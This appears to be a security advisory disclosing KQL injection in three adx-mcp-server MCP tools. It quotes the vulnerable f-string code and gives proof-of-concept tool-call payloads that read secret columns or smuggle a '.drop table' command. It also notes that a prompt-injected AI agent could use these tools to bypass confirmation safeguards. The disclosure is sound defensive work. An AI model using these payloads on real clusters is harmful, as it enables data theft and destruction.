Summary
adx-mcp-server (<= latest, commit 48b2933) contains KQL (Kusto Query Language) injection vulnerabilities in three MCP tool handlers: get_table_schema, sample_table_data, and get_table_details. The table_name parameter is interpolated directly into KQL queries via f-strings without any validation or sanitization, allowing an attacker (or a prompt-injected AI agent) to execute arbitrary KQL queries against the Azure Data Explorer cluster.
Details
The MCP tools construct KQL queries by directly embedding the table_name parameter into query strings:
Vulnerable code (permalink):
@mcp.tool(...)
async def get_table_schema(table_name: str) -> List[Dict[str, Any]]:
client = get_kusto_client()
query = f"{table_name} | getschema" # <-- KQL injection
result_set = client.execute(config.database, query)@mcp.tool(...)
async def sample_table_data(table_name: str, sample_size: int = 10) -> List[Dict[str, Any]]:
client = get_kusto_client()
query = f"{table_name} | sample {sample_size}" # <-- KQL injection
result_set = client.execute(config.database, query)@mcp.tool(...)
async def get_table_details(table_name: str) -> List[Dict[str, Any]]:
client = get_kusto_client()
query = f".show table {table_name} details" # <-- KQL injection
result_set = client.execute(config.database, query)KQL allows chaining query operators with | and executing management commands prefixed with .. An attacker can inject:
sensitive_table | project Secret, Password | take 100 // to read arbitrary tables- Newline-separated management commands like
.drop table important_data via get_table_details
- Arbitrary KQL analytics queries via any of the three tools
Note: While the server also has an execute_query tool that accepts raw KQL by design, the three vulnerable tools are presented as safe metadata-inspection tools. MCP clients may grant automatic access to "safe" tools while requiring confirmation for execute_query. The injection bypasses this trust boundary.
PoC
# PoC: KQL Injection via get_table_schema tool
# The table_name parameter is injected into: f"{table_name} | getschema"
import json
# MCP tool call that exfiltrates data from a sensitive table
tool_call = {
"name": "get_table_schema",
"arguments": {
"table_name": "sensitive_data | project Secret, Password | take 100 //"
}
}
print(json.dumps(tool_call, indent=2))
# Resulting KQL: "sensitive_data | project Secret, Password | take 100 // | getschema"
# The // comments out "| getschema", executing an arbitrary data query instead
# Destructive example via get_table_details:
tool_call_destructive = {
"name": "get_table_details",
"arguments": {
"table_name": "users details\n.drop table critical_data"
}
}
# Resulting KQL:
# .show table users details
# .drop table critical_data details
romain-deperne Reporter
Summary
adx-mcp-server (<= latest, commit 48b2933) contains KQL (Kusto Query Language) injection vulnerabilities in three MCP tool handlers:
get_table_schema,sample_table_data, andget_table_details. Thetable_nameparameter is interpolated directly into KQL queries via f-strings without any validation or sanitization, allowing an attacker (or a prompt-injected AI agent) to execute arbitrary KQL queries against the Azure Data Explorer cluster.Details
The MCP tools construct KQL queries by directly embedding the
table_nameparameter into query strings:Vulnerable code (permalink):
KQL allows chaining query operators with
|and executing management commands prefixed with.. An attacker can inject:sensitive_table | project Secret, Password | take 100 //to read arbitrary tables.drop table important_dataviaget_table_detailsNote: While the server also has an
execute_querytool that accepts raw KQL by design, the three vulnerable tools are presented as safe metadata-inspection tools. MCP clients may grant automatic access to "safe" tools while requiring confirmation forexecute_query. The injection bypasses this trust boundary.PoC